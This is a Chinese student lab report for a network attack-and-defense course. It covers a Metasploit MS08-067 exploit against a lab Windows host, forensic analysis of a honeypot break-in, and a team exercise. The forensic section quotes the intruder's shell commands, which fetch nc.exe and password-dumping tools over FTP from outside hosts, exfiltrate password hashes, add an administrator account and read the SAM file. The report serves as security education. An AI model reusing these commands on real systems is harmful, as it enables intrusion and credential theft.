# 20232827 2023-2024-2 《网络攻防实践》实践六报告

1.实践内容

(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2.实践过程

2.1 动手实践Metasploit windows attacker
查看winXPAttacker的IP地址为192.168.200.3
在这里插入图片描述
使用Win2kServer作为靶机,如图二所示,靶机IP为192.168.200.124
在这里插入图片描述
打开cygwin shell,并输入命令msfconsole等待Metasploit加载完成。
在这里插入图片描述
然后我们使用MS08-067漏洞
在这里插入图片描述
然后我们设置攻击载荷为TCP反向连接载荷,并设置lhost为攻击机IP,rhost为靶机IP
在这里插入图片描述
最后使用命令exploit即可获取靶机的Shell
在这里插入图片描述
攻击成功后,就进入到了靶机的命令行界面,输入ipconfig/all就可以查看靶机的相关信息了
2.2取证分析实践:解码一次成功的NT系统破解攻击
打开kali,在kali上下载
在这里插入图片描述
下载好后用wireshark打开
将过滤条件设置为:ip.addr==172.16.1.106 and http
在这里插入图片描述
第117行出现一个字符 %C0%AF,百度之后得知…%C0%AF…为“/”的Unicode编码,因此猜想靶机存在Unicode解析错误漏洞。
在这里插入图片描述
140这行,看到一个msadcs.dll文件
在这里插入图片描述
对第149行进行HTTP流追踪,发现一行数据为 --!ADM!ROX!YOUR!WORLD!,搜索之后了解到这应该是一个RSD漏洞攻击
在这里插入图片描述
在HTTP流中还发现了一组shell脚本代码:
在这里插入图片描述
将这种代码全都提取出来,得到如下结果:

shell (“cmd /c echo werd >> c : f u n ” ) ;
shell ( “cmd /c echo user johna2k > ftpcom” ) ;
shell ( “cmd /c echo hacker 2000 >> ftpcom” ) ;
shell ( “cmd /c echo get pdump.exe >> ftpcom” ) ;
shell ( “cmd /c echo get nc.exe>>ftpcom” ) ;
shell ( “cmd /c echo quit>>ftpcom” )
shell ( “cmd /c ftp – s : ftpcom- n www.nether.net” ) ;
shell ( “cmd /c pdump .exe>>new.pass” ) ;
shell ( “cmd /c echo userjohna2k > ftpcom2 ” ) ;
shell ( “cmd /c echo hacker2000>>ftpcom2 ” ) ;
shell ( “cmd /c put new . pass>>ftpcom2 ” ) ;
shell ( “cmd /c echo quit>>ftpcom2 ” ) ;
shell ( “cmd /c ftp -s : ftpcom2 – n www.nether.net” ) ;
shell ( “cmd /c ftp 213.116.251.162 ” ) ;

shell ( “cmd /c echo open 213.116.251.162 > ftpcom ” ) ;
shell ( “cmd /c echo johna2k > ftpcom” ) ;
shell ( “cmd /c echo hacker2000>>ftpcom” )
shell ( “cmd /c echo get samdump.dll>>ftpcom” ) ;
shell ( “cmd /c echo get pdump.exe>>ftpcom” ) ;
shell ( “cmd /c echo get nc.exe>>ftpcom” ) ;
shell ( “cmd /c echo quit>>ftpcom” ) ;
shell ( “cmd /c ftp – s : ftpcom ) ;

shell ( “cmd /c open 212.139.12.26 ” ) ;
shell ( “cmd /c echo johna2k>>sasfile ” ) ;
shell ( “cmd /c echo haxedj00>>sasfile ” ) ;
shell ( “cmd /c echo get pdump.exe>>sasfile ” )
shell ( “cmd /c echo get samdump.dll>>sasfile ” ) ;
shell ( “cmd /c echo get nc.exe>>sasfile ” ) ;
shell ( “cmd /c echo quit>>sasfile ” ) ;
shell ( “cmd /c ftp – s : sasfile ” )

shell ( “cmd /c open 213.116.251.162 ” ) ;
shell ( “cmd /c echo johna2k>>sasfile ” ) ;
shell ( “cmd /c echo haxedj00>>sasfile ” ) ;
shell ( “cmd /c echo get pdump.exe>>sasfile ” ) ;
shell ( “cmd /c echo get samdump.dll>>sasfile ” ) ;
shell ( “cmd /c echo get nc.exe>>sasfile ” ) ;
shell ( “cmd /c echo quit>>sasfile ” ) ;

shell ( ” cmd / c C : ProgramFiles CommonFiles system msadc pdump.exe > > yay.txt ” )
shell ( ” cmd / c C : ProgramFiles CommonFiles system msadc pdump.exe > > yay.txt ” )
 
shell ( ” cmd / c pdump.exe >> c : yay.txt ” )
shell ( ” cmd / c net session > > yay2.txt ” )
shell ( ” cmd / c net session > > yay2.txt ” )
shell ( ” cmd / c net users > > heh.txt ” )
shell ( ” cmd / c net users > > c : heh.txt ” )
 
shell ( “ / c n e t localgroup Domain Admin I W A M _ K E N N Y / A D D ” )
shell ( “ / c n e t user testuser UgotHacked / A D D ” )
shell ( “ / c n e t localgroup Administrators testuser / A D D ” )
 
shell ( ” cmd / crdisk – / s ” )
shell ( ” cmd / crdisk – s “ )
shell ( ” cmd / crdisk ” )
shell ( ” cmd / crdisk – / s ” )
shell ( ” cmd / crdisk – s “ )
shell ( ” cmd / crdisk / s –“ )
shell ( ” cmd / crdisk / s –“ )
shell ( ” cmd / crdisk / s –“ )
 
shell ( ” cmd / c typec : winnt repair sam . _ > > c : har.txt ” )
shell ( ” cmd / c delc : inetpub wwwroot har.txt ” )
shell (” cmd / c delc : inetpub wwwroot har.txt “)

攻击者使用了什么破解工具进行攻击?攻击者利用口令破解工具和nc.exe来实现对目标主机的攻击,Nc.exe:完成远程主机连接等工作。

攻击者如何使用这个破解工具进入并控制了系统?完成远程主机连接后,利用telnet操作实现对操作系统的控制。

我们如何防止这样的攻击?及时下载厂商提供针对这类漏洞的相关补丁

你觉得攻击者是否警觉了他的目标是一台蜜罐主机?
2.3团队对抗实践:windows系统远程渗透攻击和分析
实验环境:
先把靶机和攻击机都设置为桥接模式,将靶机设置为自动获取IP地址。
攻击机:192.168.239.225
靶机:192.168.239.103
在这里插入图片描述测试连通性
在这里插入图片描述
先msfconsole:
在这里插入图片描述
在这里插入图片描述
攻击成功,通过命令创建文件夹tzq123
在这里插入图片描述

此时,靶机处多了一个文件夹
在这里插入图片描述

抓包:

在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题1:实验三中无法连接成功
  • 问题1解决方案:靶机和攻击机都要设置为桥接模式,win2k设置网络
  • 问题2:kali设置为桥接模式后就没网了
  • 问题2解决方案:后来重启了几次就行了。。。

4.实践总结

通过动手实践Metasploit windows attacker,我深入了解了Metasploit工具的使用方法,并掌握了对Windows系统进行远程渗透攻击的技能。其次,通过取证分析实践,我学会了如何分析一次成功的NT系统破解攻击,包括攻击者可能采用的工具、攻击过程和攻击目标。最后,在团队对抗实践中,我体验了攻防对抗的过程,既能够利用Metasploit选择漏洞进行攻击,也能够利用Wireshark监听网络数据包来分析攻击过程,从而更全面地理解了攻击和防御的策略。这次实验不仅提升了我的动手能力,也增强了我对网络安全的认识。

参考资料

前人的博客

  • https://blog.csdn.net/lbxyzj/article/details/130114018?csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22130114018%22%2C%22source%22%3A%22lbxyzj%22%7D
  • 【20199114 2019-2020-2 《网络攻防实践》第七周作业 - 王昱皓 - 博客园】https://www.cnblogs.com/wongyoho/p/12699425.html
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值